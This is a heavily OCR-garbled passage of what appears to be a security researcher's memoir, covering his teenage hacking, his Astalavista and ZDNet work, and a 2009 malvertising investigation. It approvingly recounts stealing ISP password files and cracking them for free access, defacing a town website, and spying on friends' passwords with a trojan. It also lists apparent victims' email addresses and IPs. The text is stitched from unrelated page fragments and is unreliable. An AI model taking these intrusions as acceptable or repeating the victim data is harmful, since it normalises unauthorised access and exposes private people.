revenue in the process. It would later come to his attention that the guy that approached him 
was actually one of the key members of the infamous Sub7 trojan horse group which at a 
particual point in time was responsible for launching a DDoS (Distributed Denial of Service) 
attack against the researcher Steve Gibson who extensively profiled the campaign and 
actually had a conversation with HeLLfiReZ and his team members for the purpose of finding 
out how launched the attack and how it took place. He would eventually run a personal 
hacking and security Web site archive using hosting courtesy of his employer LockDownCorp 
and run a popular Hacking and Security Web site which he would then feature on 
Progenic.com’s Top100 Hacking and Security Web sites including to actually offer paid 
security consultations in terms of finding out ways to help people protect their home PCs from 
trojan horses and teaching them how to use a firewall and how they can secure their home 
PCs. 


At a later stage in his early Information Security career he would visit and join 
https://itsecurity.com’s Security Clinic where | would have his personal biography featured 
and actually respond to common security questions which users of the Web site will submit 
and have his response featured on the front page potentially driving traffic to his employer at 
the time which was Frame4 Security Systems and actually improving his knowledge and 
understanding of Information Security in general. Dancho was also known for having 
participated in the Blackcode Ravers hacking group which was running the popular 
https://blackcode.com Web site at the time and actually participated with two issues of a 
popular Security Newsletter at the time which were featured on the home page of the portal. 
During the glorious years of IRC (Internet Relay Chat) where Dancho was busy hanging on 
several IRC networks including DALNet and his local country’s IRC network he managed to 
obtain the /etc/shadow password file for his entire ISP (Internet Service Provider) which at the 
time was Digital Systems and shared a copy of it with his best friend at the time George 
Kadiyski for the purpose of using several popular and high-profile Wordlists including John the 
Ripper password cracker potentially obtaining access and brute-forcing the entire password 
list for hundreds of active dial-up Internet based accounts at the time. 


Over a period of several days the results at the time were outstanding in the context of 
actually succeeding in the brute-forcing process potentially allowing Dancho and his friend to 
easily access free Internet based dial-up accounts which at the time cost money allowing 
them to use the Internet for free. At a later stage Dancho also managed to obtain access to 
his local town’s competing ISP (Internet Service Provider) which was known as BIANet 
/etc/shadow which was send to him by a friend and he also once again shared it with his 
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friend who would once again begin brute-forcing the password file using a variety of 
Worldlists and the infamous John the Ripper passwor cracking tool at the time potentially 
allowing Dancho and his friend easy access to unlimited Internet based dial-up connectivity. 


It would be fairly easy to assume how things got complicated with Dancho quickly obtaining 
access to Internet Relay Chat’s primary mIRC application including a variety of IRC-based 
“War Scripts” including a dozen of mail-bombers and various other ICQ-based type of Nukers 
and Flooders on his way to demonstrate a proper technical know-how to his friends and peers 
in the shady world of hacking. Among the first channels he tried to access were #hacker 
#hackers #hacking and the infamous #hackphreak on EFNet including to actually open 
several personal channels on the local IRC networks including #drugs #KGB and 
#linuxsecurity. At a later stage he actually managed to ask a friend for a possible operator 
status on the local town’s IRC channel where he was basically running a 24/7 online 
protection bot known as xploit including the active use of a Socks5 server which at the time 
was offered by his employer LockDownCorp where he was busy acting as Technical Collector 
of trojan horses/worms/viruses and VBS scripts for the purpose of improving the anti-trojan 
software’s signatures-based detection rates. 


Among the first thing that Dancho decided to do in his spare time is to actively research the 
local Webmaster of his hometown’s official Web site for the purpose of attempting to launch a 
social engineering attack against his local town’s official Web site which basically succeed 
and resulted in a “greeting” message being posted on the official Web site with no actual 
data destruction and data removal taking place in what would appear to be a professional 
approach when compromising a legitimate Web site for the purpose of greeting his personal 
friends and spread a message on behalf of “Trojan Hacking Group” which at the time basically 
consisted of one of his closest friends and another fellow hacker enthusiast. Among his 
responsibilities the time included the active collection of trojan horses/worms/viruses and 
VBS Scripts with the idea to share them with his employer which at the time was 
LockDownCorp one of the world’s leading anti-trojan vendors for the purpose of improving 
the detection rate for these publicly accessible trojan horses in what would later on mature 
into a successful Technical Collection operation which basically paid his bills and actually 
offered him a decent financial incentive to continue getting involved in security as a hacker 
enthusiast and actually improved his employer’s overall detection rate for some of the most 
prolific trojan horses at the time. 


The actual contractual agreement had to do with Dancho using a private FTP server where he 
would spend hours uploading collected trojan horses using his home-based dial-up connection 
and eventually earning a revenue in the process using Western Union where he was happy to 
have established direct working relationship with one of the world’s leading anti-trojans 
vendors which at the time was located at — http://proxy2.stealthedip.com/maniac/incoming/ 
Whenever Dancho would attempt to reach out to his friends he would attempt to find out 
whether they are online using a popular trojan horse including to actually check his email 
account for their recently changed passwords and other related information including their 
current IP so that he can properly connect to their home PC for educational purposes. 
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Top 10 Tools Security Directory Security News Tutorials Geeky Photos 


Test your nctwork scourity from a hacker's point of view with GF LANgquard 1.5.5! 


Links 


About Astalavista 


Version 7 now offers anti-virus /anti-sewware checks & hybrid environment support - Download today! 


( search list } [ become a member |} 
Astalavista.net member 


Linking to Astalavists.com 
We are abveays bo ew st 
Contact us, an 

Astalavista FAQ , read 
Interview with a core 


We suggest you try out 
UsetiexT - del speed 
own 9 S 


Astalavista Flash Movie 2004 Check it 
Astalavista Flash Movie 2005 Fee th 


Danger: Authenticating ¢- mail can break it 

Novell in $72m security management buy 
Telecommuting security concerns grow 

Kids outsmart Web filters 

We're winning the war against hackers 

Man fined $US84k in spyware case 

Yahoo accused of helping jail Internet writer 
Mozilla users urged to upgrade 

Microsoft to dose scaurity updates on old Windows 


23GB FREE ! 


The Evolution Of Spy Toots 
Internet Explorer Virtualizer 


Social Engineering: The Biggest Risk to 
Internet Security 

Reversing Ransomware / Cyber 
extortion malicious code - video 

The Price of Restricting Vulnerability 
Pubbcations 

Nodezilla 0.4.18 

LET - Layer Four Traceroute (LFT) and 
Whob 

Brief analysis of security scam hijacker 
installation method 


5 Reasons to Choose Simple Sandboxing 


Debugging 101 
Web Application Seaurity Podcast 
Oracle Database Security 


An Economic Analysis of Airport Security 


Screening 
How to Encrypt BitTorrent Traffic 


While Dancho was busy studying in the Netherlands he was busy persistently checking one 
of the World’s most popular and high-trafficked Web sites for hackers and security experts - 
Astalavista.com - and sticking to the common wisdom circa the 90‘s where everyone was busy 
making contributions and launching new groups - he decided to approach the company behind 
the portal with a possible business proposal that basically consisted of having him monitor and 
actually maintain the portal in terms of content including the actual production of a high-profile 
Security Newsletter where we would produce security and hacking articles including a featured 
Security Interview with key members from the Scene and the Security Industry. 
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Mitarbemer Get Astatrresta Groep 
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What used to be a daily routine to work for ZDNet’s Zero Day blog for four productive years 
on a daily basis as a security blogger in between publishing personal research on my blog and 
later on receiving a direct offer to work with Webroot for the position of a security blogger 
was a dream come true where on both places | had the privilege to work and contribute with 
knowledge and research with some extremely knowledgeable and popular folks including my 
corporate citizenship passport which at the time was the crown jewel of my experience which 
was to visit InfoSec Europe 2012 in Earls Court in London with my company Webroot where 
knowing everyone and working with everyone from day one was quite a success and I’m ex- 
tremely grateful for contributing to the growth of the company with my own knowledge and 
expertise and for basically that | have up to present day which was the highlight of my research 
at the time namely to join the company and enter the corporate world of information security 
and security blogging which | know so well up to present day and highly miss the productive 
days back then. 
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Astalavista Security Group 
04.06.05 
@)Discuss Total posts: 1 


www.astalavista.com 
Google pages indexed: < 100,000 
Backlinks: < 1,000,000 


Started by a hacker/enthusiast in 1997, Astalavista has grown into 
an amazing melting pot of black hats, white hats, and everything in 
between. Whether you're learning how to be digitally naughty or 

<< Hpim YOU want to know how to avoid becoming a victim, it's hard to find a 
better mixture of battlefront news, tips, cracks, and hacks. 


Prior to getting a confirmation from a Team Member of the actual owner of the portal at the 
time Dancho quickly began entering into negotiations about a possibly paid including a free 
venture at the time where he could earn a small commission for producing a high-quality 
security newsletter and actually be responsible for all the security and hacking content at 
Astalavista.com on a monthly and daily basis. As he began working on the monthly 
newsletter the first issue including the remaining twenty six issues which he produced over a 
period of three years were quite a success including the actual Geeky Photos section where 
portal users could send in photos of their desktop computers for the purpose of featuring 
them at the Web site potentially promoting their desktop setups to our audience at the time 
eventually leading him and the portal to win a PCMagaine Top 100 Security Sites Award back 
in 2005. Among Dancho’s main responsibilities at the time where the daily updating of the 
portal with high quality security documents tools and presentations including actual hacking 
and security links and overall responsibility for all the content at the Web site including the 
production of a highly popular security newsletter at the time including to actually answer and 
work on possible partnership and advertising inquiries at the time which led to a successful 
repositioning of the portal as one of the primary information security portal services online. 
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Jessus. Who would have thought? At a specific point in my time and my career as a 
cybercrime fighter and cybercrime researcher including OSINT analyst and threat intelligence 
analyst at some point in time after approximately a decade in fighting bad guys and actually 
tracking them down and exposing their infrastructure | finally got a very interesting email 
which was basically a screenshot courtesy of a Russian Business Network franchise member 
that was basically showcasing ownership over their primary domain which was nearly 
impossible to receive and in specific the fact that the original and primary Russian Business 
Network franchise domain name doesn’t really exist in the context of having virtual no clues 
of its online existence which was quite a remarkable success in the context that it would have 
motivated many to pursue a pension in the field which basically included the actual message 
saying “hi” and greeting me which was quite a success at the time in the context of receiving 
a personal message from the Russian Business Network franchise proving ownership of their 
primary domain name. How did | originally stumbled upon the Russian Business Network? It 
was by going through other people’s research on the topic and basically by doing my job at 
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The very idea that the money mule has reached the tipping point of its gullibility in or- 
der to provide the organization with access to their bank account is surreal, but clearly 
possible since having reached point of the registration process means they have absolutely 
no idea what they’re doing. 


The following are sample screenshots from the web interface used by the organization 
and the money mules themselves: 


You have new message. Read a John Blackmore 


Tasks Messages | My money My Profile | Documents | Officialinvoices | Help Quit 


@ MY TASKS 


A 


rer 4 Transaction 136357 “EW Open High Araeree Comment by Admin 


@ COMPLETE TASK 


a 


% Transaction 136357 Open High aaa Comment by Admin 


Further instructions > 


Dear John Blackmore, 


We are glad to inform you about new task! Please review transfer details: 


2723 


the time which was quite a success in terms of daily monitoring for malicious and fraudulent 
online activity which led me to stumble upon their malicious infrastructure on numerous 
occasions in specific to find out more about their rogue and malicious bulletproof hosting 
infrastructure which used to dominate the threat landscape at the time in terms of popularity 
and the primary bulletproof hosting provider for a variety of cybercriminals internationally. | 
was also originally inspired by the usual source of inspiration for me which was basically 
iDefense actual threat research reports at the time that were basically going a step beyond 
the typical threat intelligence reports and were basically including all the necessary and 
in-depth details on various cyber threat actors at the time including primary sources of 
cybercrime activity internationally. 
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Dancho, HBGary is interested in talking w/ you about Threat 
Intelligence 


From: greg@hbgary.com 
To: dancho.danchev@gmail .com 
Date: 2009-04-15 13:02 


Subject: Dancho, HBGary is interested in talking w/ you about Threat Intelligence 


Dancho, 


My company, HBGary, is developing a new business unit which we call “Global 
Services". A keystone of the offering is tracking human and organizational 
factors behind malware threats. Your work, and some of the work of your 
peers, seems to be very good analysis in this area. Since the space is new 
to us, I want to tap the best minds in the industry to help us develop an 
offering. Would you be interesting in spending some time with our team to 
discuss your work and methodology? On the market side I am also trying to 
pin down what customers will actually pay for, and perhaps you have some 
insight here as well. I am willing to hire you as a consultant, and/or pay 
for your time and travel in any way that works for you. I will be at RSA 
next week, and our company has an event for customers in San Jose in the 


first or second week of May. I also travel to Washington DC quite alot. 


Among the first things that I did prior to trying to pop up online back in full soeed and fashion 
was to quickly built a set of projects including to launch several popular and interesting 
initiatives such as for instance Law Enforcement and OSINT operation called “Uncle George” 
where the ultimate goal was to collect as much publicly accessible information on the bad 
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guys then data mine and present my findings to the wider security industry and community 
including to look for and present tons of actionable intelligence on the bad guys which could 
have been useful in the context of having vendors and organizations attempt to launch cyber 
attack and cyber campaign attribution efforts against these individuals. 


At some specific point in time | came across the local for Bulgaria Cyber Security Talks event 
where | applied to make a presentation which got accepted which led me to eventually pop 
up at the event in front of eighty people and make a high-quality personal presentation on 
cybercrime research OSINT and threat intelligence including my general experience in the field 
as an expert in the field of cybercrime research OSINT and threat intelligence gathering where 
I’m an independent contractor since practically December, 2005. 


It used to be a moment when | originally started getting involved in OSINT (Open Source Intelli- 
gence) as an independent contractor when | originally came across to the following document 
which greatly inspired me to join this space - “Reexamining the Distinction Between Open Infor- 
mation and Secrets” while browsing through Globalsecurity.org Fas.org Cryptome.org at that 
time. The primary reason why OSINT inspired me to become an independent contractor in this 
space in specific information security is the fact that a lot of the documents that | had to go 
through to learn what OSINT is and how to do it were either classified or publicly accessible 
however coming from important sources of information such as for instance the CIA.gov includ- 
ing various other U.S Government and U.S Intelligence Community sources of information. It 
is my opinion that the power of OSINT primary relies on the actual collection and working with 
the actual decision-making information using public sources which also includes actual enrich- 
ment and colleration between multiple sources of publicly accessible classified and declassified 
information which makes this area quite interesting to join from an independent contractor per- 
spective in the information security field. 
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At a specific point in time | must have gathered a proper momentum among my readers which 
| never really knew anything about including the bad guys in the context of intercepting a 
chatter mentioning me in a pretty bad context despite the fact that this is untrue as most of 
my research and the research that I did was in a passive mode namely | never really engaged 
anyone in specific friends and colleagues from the industry including the bad guys as I’m a 
firm believer that you can collect all the information that you need on them without bothering 
to interact or approach them. Among the few key comments that I’ve ever came across to 
referencing me in my entire career on a major cybercrime-friendly forum community was a 
Darkode discussion including a hitman request for me which apparently managed to find me 
one way or another including a second discussion which basically referenced my name and 
insisted that the same thing that took place with me back in 2011 will happen again. What 
really took place back in 2011 in my apartment in Sofia where | relocated on my own and where 
| insisted to live on my own and do my research using my ZDNet salary as a primary means to 
pay for my rent and living expenses is. 
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JjJanuo Jlanyes e Ha 26 roqHHH, MexKTyYHapOHO NpH3HaT eKcnepT 
lo KHOepcurypHOCT. Tol nuime 3a cChelwamtH3sHpaHHaA Onor Zero 
Day, 4acT OT HOBHHapcKaTa Mpexka Zdnet.com. IIpes cenTemBpu 
2010 r. JJanyo Jlanyes H34e3Ba H OTTOFaBa He OTTOBapA Ha CBOHTe 
KoopauHatTH. TocneqHaTa My AKTHBHOCT B Twitter e OT OKTOMBDH. 
OT BbhTpeMIHOTO MHHHCTepcTBO KOMeHTHpat, Ye Jano Jlanues 
mocera He e 6171 OOABABAH 3a H34e3Hal OT CBOHTEe OJIN3KH. 


The primary reason behind this post is to tell my story with all the juicy details up to present 
day and actually offer an in-depth and never discussed before perspective on my research in- 
cluding to present and communicate the crown jewels of my research to a vast and growing 
network of readers internationally where the ultimate goal would be to properly present the 
true story behind my professional career including to offer an in-depth peek inside my teenage 
hacker years experiences while properly present my story up to present day where I’m an inter- 
nationally recognized cybercrime researcher security blogger and threat intelligence analyst. 
Dancho Danchev Presenting at CyberCamp 2016 in Spain How did | attempt to take down the 
Koobface botnet? Who’s Hilary Kneber? What was the primary idea behind “Keeping Money 
Mule Recruits on a Short Leash” blog post series? How did | prevented and actually detected a 
possible kidnapping attempt? How did | made it to the GCHQ with the Honeynet Project? Is is 
true that I’ve received an invitation to present at Canadian Intelligence Services? What’s my 
professional experience with my current employer WhoisXML API? 
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Cyber 


Intelligence 


The Definite Cybercrime and Web 2.0 Memoir 
Courtesy of Dancho Danchev 
The RBN, The Kooblace Botnet, The Rock Phish Gang 
Spam Phishing and Malware Campaigns including Botnet 
and Money Mule Recruitment Scams Traced Down to Ther 
Source including Various Underground Market Propositions 
Exposed 


hitps Addanchev. blogspot.com 


Dancho Danchev 


| never really bothered to stop publishing content on my personal blog which | felt is an obliga- 
tion to the society and my readers who | really know nothing about in the context of presenting 
my knowledge and they will come and in the context of never really bothering to set up my 
Google Analytics property properly where | was sticking to basically monitoring my RSS Feed- 
burner subscriber account which at the time peaked at 7,000 RSS readers on average on a 
daily basis which is quite a success for one man operation that never really bothered to know 
anyone from the industry in the context of basically presenting my findings and knowledge and 
later on getting surprised in the context of having folks and people from the industry approach 
me to say hi invite me to attend a conference share information or ask for information where 
I’m always there to appreciate their research and knowledge and continue to contribute with 
research and knowledge on my personal blog. 
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VISITOR ANALYSIS 


Referring Link No referring link 
Host Name cla,.gov 
IP Address eed [Label IP Address] 
Country United States 
Region District Of Columbia 
City Washington 
ISP Central Intelligence Agency 
Returning ¥isits 0 
¥isit Length 0 seconds 
VISITOR SYSTEM SPECS 

Browser 

Operating System 

Resolution 

Javascript 


Navigation Path 


Date Time WebPage 


13th June 2007 20:44:36 No referring link 
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Referring Link — 
Host Name Cd bi .gov 
IP Address Cd Label IP Address] 
Country United States 
Region Illinois 
City Oregon 
ISP ——— 
Returning Y¥isits me 
Visit Length 1 hour 0 mins 0 secs 
VISITOR SYSTEM SPECS 
Browser 
Operating System 
Resolution 
Javascript 

Navigation Path 

Date Time WebPage 
2nd November 2007 13:36:16 
2nd November 2007 13:42:10 
2nd November 2007 14:36:16 
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Referring Link No referring link 


Host Name $8.gov 
IP Address Ce] (Label IP Address] 
Country United States 
Region Maryland 
City Columbia 
ISP —— 
Returning ¥isits 8 
Visit Length 6 hours 54 mins 47 secs 
VISITOR SYSTEM SPECS 

Browser 

Operating System 

Resolution 

Javascript 


Navigation Path 


Date Time WebPage 
13th November 2007 13:46:57 


13th November 2007 14:10:12 


13th November 2007 18:03:10 


How did | attempt to take down the Koobface botnet? Who’s Hilary Kneber? What was the 
primary idea behind "Keeping Money Mule Recruits on a Short Leash" blog post series? How 
did | prevented and actually detected a possible kidnapping attempt? How did | made it to 
the GCHQ with the Honeynet Project? Is is true that I’ve received an invitation to present at 
Canadian Intelligence Services? What’s my professional experience with my current employer 
WhoisXML API? 


What does rocking the boat really means? If it’s going to be massive it better be good. At some 
particular point in time when | was busy working on my personal blog | remember a moment 
when every day’s story used to dominate my life being in particular the fact that I’ve managed 
to tell a story for the purpose of sharing it and reaching out to my readership which at the time 
| was hoping that it was growing with several high prole daily users that | was busy tracking on 
a daily basis. 


The juicy details? At some point in time when | was originally secretly monitoring who was 
visiting my blog using Statcounter.com where | was hoping to see someone famous I’ve noticed 
that | got a regular visitor from The Pentagon who was basically visiting the blog on a daily basis 
during not necessarily a specific time but in general which was great news and this greatly 
motivated me to continue posting high-quality research and news and commentary articles on 
various events that took place in the security industry including across the globe. 


| also got several visitors from the CIA, the NSA including the FBI the NYTimes and BBC which 
was an outstanding audience at the time which was quite interesting to monitor and interact 
with at that time through my daily blog posts on a variety of interesting and high-quality topics. 


Up to present day I’m a 38 years old security blogger OSINT analyst and threat intelligence an- 
alyst from Bulgaria. I’m currently running one of the security industry’s most popular security 
publications which is my personal blog-Dancho Danchev’s Blog-Mind Streams of Information 
Security Knowlwedge. I’ve been running my publication since December, 2005 and throughout 
the years | had an overage of 7,000 RSS feed subscribers including 5.6M page views throughout 
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the years making my blog an extremely important switchboard to the world of security blog- 
ging OSINT research and analysis threat intelligence analysis and most importantly cybercrime 
fighting research and analysis. 


I’m also acting as a DNS Threat Reseaarcher at WhoisXML API. 


Among my key accomplishments include my "lawful surveillance" and "lawful interception" ex- 
perience as teenage hacker the production of the popular Astalavista Security Newsletter circa 
2003-2006 including the "take-down" of the Koobface botnet [MP3] including a participation in 
Top Secret GCHQ program called "Lovely Horse" including regular appearance in major news 
publications for interview and expert opinion including Techmeme, ZDNet, CNN, PCWorld, SC- 
Magazine, TheRegister, NYTimes, CNET, ComputerWorld, H+Magazine and regular security and 
research presentation appearance at major security events at GCHQ, Interpol, InfoSec Europe, 
RSA Europe and CyberCamp. 


I’m an internationally recognized expert in the field of cybercrime fighting and threat intelli- 
gence gathering having actively pioneered my own methodlogy for processing threat intelli- 
gence which leads me to a successful set of hundreas of high-quality anaysis and research 
articles published at the industry’s leading threat intelligence blog-ZDNet’s Zero Day, Dan- 
cho Danchev’s Mind Streams of Information Security Knowledge and Webroot’s Threat Blog 
with his research featured in Techmeme, ZDNet, CNN, PCWorld, SCMagazine, TheRegister, NY- 
Times, CNET, ComputerWorld, H+Magazine currently producing threat intelligence at the indus- 
try’s leading threat intelligence blog-Dancho Danchev’s-Mind Streams of Information Security 
Knowledge. 


With my research featured at RSA Europe, CyberCamp, InfoSec, GCHQ and Interpol | con- 
tinue to actively produce threat intelligence at the industry’s leading threat intelligence blog - 
Dancho Danchev’s-Mind Streams of Information Security Knowledge publishing a diverse set 
of hundreds of high-quality research analysis detailing the malicious and fraudulent activities 
at nation-state and malicious actors across the globe. 


Key achievements include: 

- Presented at the GCHQ with the Honeynet Project 

- SCMagazine Who to Follow on Twitter for 2011 

- Participated in a Top Secret GCHQ Program called "Lovely Horse" 

- Identified a major victim of the SolarWinds Attack-PaloAltoNetworks 
- Found malware on the Web Site of Flashpoint 

- Tracked monitored and profiled the Koobface Botnet and exposed one botnet operator 
- Made it to Slashdot two times 

- My Personal Blog got 5.6M Page Views Since December, 2005 

- My old Twitter Account got 11,000 followers 

- | had an average of 7,000 RSS readers on my blog 


- | have my own vinyl "Blue Sabbath Black Cheer / Griefer-We Hate You / Dancho Danchev Suck 
My Dick" madeby a Canadian artist 


- Currently running Astalavista.box.sk 
- | gave an interview to DW on the Koobface Botnet 


- | gave an interview to NYTimes on the Koobface botnet 
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- | gave an interview to Russian OSINT 

- Listed as a major competitor by Jeffrey Carr’s Taia Global 

- Presented at the GCHQ 

- Presented at Interpol 

- Presented at InfoSec 

- Presented at CyberCamp 

- Presented at RSA Europe 

In the past I’ve been a member of: 

* A Member to Warlndustries (http://warindustries.com) 

* List Moderator at BlackCode Ravers (http://blackcode.com) 
* Contributor Black Sun Research Facility (http://blacksun.box.sk) (BSRF) 


* List Moderator Software Contributor (TDS-2 Trojan Information Database) 
(https://packetstormsecurity.com/files/25533/tlibrary.zip.html) DiamondCS Trojan Defense 
(http://tds.diamondcs.com.au) 


* Contributor to LockDownCorp (http://lockdowncorp.com) 
* Contributor to HelpNetSecurity (http://forbidden.net-security.org) 
* A Security Consultant for Frame4 Security Systems (http://frame4.com) 


* Contributor to TechGenix’s WindowSecurity.com (http://www.windowsecurity.com/authors/d- 
ancho-danchev/) 


* Technical Collector-LockDownCorp-(https://lockdowncorp.com) 

* Managing Director-Astalavista Security Group-(https://astalavista.com) 
* Security Consultant-Wandera-(https://wandera.com) 

* Threat Intelligence Analyst-GroupSense-(https://groupsense.io) 

* Security Consultant-KCS Group Europe-(https://kcsgroup.com) 

* OSINT Analyst- Treadstone71 -(https://treadstone71.com) 

* Security Blogger-Armadillo Phone-(https://armadillophone.com) 

* Security Blogger for ZDNet (http://www.zdnet.com/blog/security/) 

* Threat Intelligence Analyst for Webroot (https://www.webroot.com/blog/) 


| would like to thank the following people for contributing to the Scene throughout the 90’s up 
to present day and for keeping up the good work part of Astalavista.com’s Security Newsletter 
which | produced circa 2003-2006. 


* Proge- http://www.progenic.com/ 

* Jason Scott-http://www.textfiles.com/ 

* Kevin Townsend -http://www.I|tsecurity.com/ 

* Richard Menta- http://www. bankinfosecurity.com 
* MrYowler-http://www.cyberarmy.net/ 


* Prozac -http://www.astalavista.com/ 
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* Candid Wuest-http://www.trojan.ch/ 

* Anthony Aykut-http://www.frame4.com/ 

* Dave Wreski-http://www.linuxsecurity.com/ 

* Mitchell Rowtow-http://www.securitydocs.com/ 
* Eric (SnakeByte) -http://www.snake-basket.de/ 
* Bjorn Andreasson-http://www.warindustries.com/ 
* Bruce -http://www.dallascon.com/ 

* Nikolay Nedyalkov-http://www.iseca.org/ 

* Roman Polesek-http://www.hakin9.org/en/ 

* John Young -http://www.cryptome.org/ 

* Eric Goldman-http://www.ericgoldman.org/ 

* Robert-http://www.cgisecurity.com/ 

* Johannes B. Ullrich-http://isc.sans.org/ 

* Daniel Brandt-http://google-watch.org/ 

* David Endler-http://www.tippingpoint.com/ 

* Vladimir, 3APA3A-http://security.nnov.ru 


In this video I’ll discuss in-depth a variety of personal projects and current and ongoing both 
real-time current and historical research and analysis activities in the following categories such 
as for instance: 


- My Dark Web Onion 

-My Uncle George Law Enforcement and OSINT Enrichment Operation 
-My Cybercrime Forum Data Set 

-My Unit-123.org E-Shop for Intelligence Deliverables Project 

-My Offensive Warfare 2.0 Threat Intelligence Clearing House Project 
-My Disruptive Individual’s Threat Intelligence Feed 

-My Current work as a DNS Threat Researcher with WhoisXML API 
-How | ended up in Snowden’s Archive?a 

-How | ended up on Wikileaks? 


-How | made it into several comparative academic studies on the quality of sharing threat 
intelligence and cybercrime research information? 


-How come I’m the only one listed as a competitor in Jeffrey Carr’s Taia Global Competitors 
Slide? 


-What’s it’s like to run the infamous Astalavista.com portal back in 2003-2006 where | was 
acting as a Managing Director? 


-What it’s like to get the privilege to work as a security blogger at ZDNet’s Zero Day blog for 
four years? 


-What'’s it’s like to work as a security blogger with Webroot for two years? 
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-How | ended up and spend the last couple of years doing OSINT on the bad guys? 
-How | ended up having a project on the infamous Astalavista.box.sk? 


-A brief introduction into some of the latest developments and research that | posted on my 
personal blog-Dancho Danchev’s Blog-Mind Streams of Information Security Knowledge 


-How | ended up having a mobile application? 
-How | ended up having a personal memoir? 
-How | got busted? 

-What it’s like to visit the GCHQ? 

-What it’s like to meet the security industry? 
-What it’s like to visit RSA Europe 2012? 

-What it’s like to visit InfoSec 2012? 

-What it’s like to visit CyoberCamp 2016? 

-What it’s like to get an invitation to visit Canada’s Security Service? 
-My DIA Needpedia Investment Proposal 

-How | ended up discovering a SolarWinds victim? 


-How | ended up with a real-time OSINT and cyber attack attribution campaign on the Conti 
Ransomware Gang? 


-How | ended up almost retiring and offering OSINT and threat intelligence training? 


H 
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qi32muf0ikK9MDXE1u8z5GO1KGNLot cTDALBXBvSxFCvmF 2cN_DqR6sc 
11. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEgnndTPZ5M3errC8bJq-GUjOve_Rv7yFhEtdWmVDH3eXA 
O_la_eOHkEFk JwXEa_IOzSRukotodgPGcIdqzHeQ6nx8fKpOKmUI4PLO 
2. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEgr JLkn9 j6dpp1x1B18uBS10CJcgoryVMx4Ujt0sss6NC 
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Western Union orders details > 


Transfer type: 

First Name: 

Last Name: 

City: 

Country: 

Reference Number (MTCN)*: 


Western Union fee (USD)*: 


Employee details» 


First Name*: 


Last Name*: 
City*: 
Country*: 


Comments: 


@ COMPLETED TASKS 


09.01.2009 
% Transaction 136357 Done High Waiauinn Comment by Admin 


09.01.2009 
Transaction 136360 
@ Done High 18:45:18 No comment 


CG VIEW MESSAGE 


Welcome’ 


Supervisor 1 
09.01.2009 18:49:39 Dear John Blackmore. 


We welcome you as 8 new employee. Reply Trazh 


Sincerely, 
Personnel Supervisor 
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19.4.16 Exposing the Web’s Most Prolific Malvertising Operation Circa 2009 - Exclu- 
Sive (2023-04-28 16:24) 


http: “/cache.fimservecdn.com/contents/209/298/298209/C 
http: “/logiagroup. checkm8. com/data/479231 /HP_300%250.: 
http: //logiagroup.checkm8. com/data/478089/HP_?728x90. sy 
http: //imagecO5. 24 7realmedia.com/RealMedia/ads/Creative: 
http: //cache.fimservecdn.com/contents/209/298/298209/C 
http: //banner. pando. com/adimage. php ?filename=skyauction: 
http: //cache.fimservecdn.com/contents/209/298/298209/C 
http: //cache.fimservecdn.com/contents/209/298/298209/C 
http: //imagec05.247realmedia.com/RealMedia/ads/Creative: 
http: //perfect-banner.com/www/images/thapsody300%250-u 
http: //cache.fimservecdn.com/contents/209/298/298209/C 
http: //cache.fimservecdn.com/contents/209/298/298209/C 
http: //cache.fimservecdn.com/contents/209/298/298209/C 
http: //deMF. opt. fimserve. com/adopt/?r=hél=11 S00000%pUn 
http: //cache.fimservecdn.com/contents/209/298/298209/C 
http: //cache.fimservecdn.com/contents/209/298/298209/C 
http: //deMR. opt. fimserve. com/adopt/?r=hél=11011021&pUn 
http://www. howtoforge. com/measuring-linux-latency-with-late 
[1] http: //awww.tradingmarkets. com. site/news/S tock%20News/ 


Who remembers the 2009’s malvertising campaign (hxxp://trueconv.com) on the NYTimes and 
ESPN including FoxNews at the time which was dropping scareware also known as fake security 
software on the hosts of affected users who appear to have clicked an interactive advertise- 
ment on some of the Web’s most popular web sites at the time part of a rogue and sophisticated 
malvertising operation courtesy of Russia-based cybercriminals at the time who were monetiz- 
ing the fraudulently obtained and hijacked traffic using a scareware affiliate based network at 
the time? 


Keep reading. 


As | spent some time going through my old threat intelligence archive circa 2009 | found a 
crown jewel part of my research at the time which could be easily considered a must process 
enrich track down and analyze malvertising operation up to present day where I’ll do my best 
to assist everyone by sharing as much information regarding the Trueconv.com malvertising 
operation at the time including affected parties the actual URLs and domains known to have 
been involved in the campaign including related IPs and will do my best to speed up everyone’s 
work in terms of further processing and analyzing this campaign by using known historical 
OSINT processing and enrichment techniques. 


[2] 


The good question? How | got this data? It’s be figuring out a way to access access the publicly 
accessible statistics on the primary Trueconv.com malvertising operation domain circa 2009 
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which leads me to today’s analysis of what appears to be the Web’s most prolific malvertising 
operation on a wide scale circa 2009. 


The research in this post can be easily considered the malvertising market segment’s largest 
OPSEC failure even since it’s growth stage back in 2009 where the primary infection vector 
here was clien-side exploits and social engineering and where the most affected and targeted 
operating system was Windows XP where I'll do my best to offer as much historical and ac- 
tionable intelligence on Trueconv.com’s true widespread campaigns back in 2009 by offering 
a complete listing of all the actual URLs involved in the campaign including the associated 
domain names and affected IPs based on publicly obtained back then misconfigured access to 
their entire logs database which easily proves to be an invaluable wealth of information on the 
most prolific malvertising market segment operation back in 2009. 


[3] 


Email address accounts seen in the log files: 
22info@cafesferraz[.Jcom 
-itsrainingforyou@gmaill.]Jcom 
acummings@paulding[.]k12[.]gal[.Jus 
belew@comcast[.]net 
20itsrainingforyou@gmaill.Jcom 
taffytiffany@yahoo[.]com 
mwdsmanagement@coxinet[.]net 
royalcrackerzzz@gmail[.]com 
cubilonsa@gmaill[.]Jcom 
20royalcrackerzzz@gmaill[.]Jcom 
jxpecaban80@hotmail[.]Jcom 
paraexca@globetrotter[.]net 
www@oprah[.]com 

27214 


xpcar 003@live[.]Jcom 
contact@parc-vxpges-nord[. ]fr 
cjn@justice[.]gou[. ]fr 
susan@susanforrest[.]com 
Scottsmbnt@aol[.]com 
scorpioascendant@hotmail[.]com 


IPs seen in the log files presumably the actual victims of these campaigns: 
74[.]125[.]47[.]132 
93[.]175[.]232[.]154 
76[.]88[.]137[.]98 
141[.]151[.]8[.]158 
193[.]178[.]34[.]38 
58[.]65[.]245[.]234 
152[.]13[.]71[.]24 
98[.]161[.]15[.J161 
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131[.]118[.]124[.]167 
71[.]226[.]92[.]54 
75[.]185[.]213[.]12 
75[.]183[.]68[.]64 
76[.]31[.]128[.]166 
96[.]238[.]184[.]188 
69[.]86[.]199[.]68 
64[.]83[.]248[.184 
74[.]255[.]195[.]114 
75[.]35[.]242[.]17 
98[.]166[.]33[.]128 
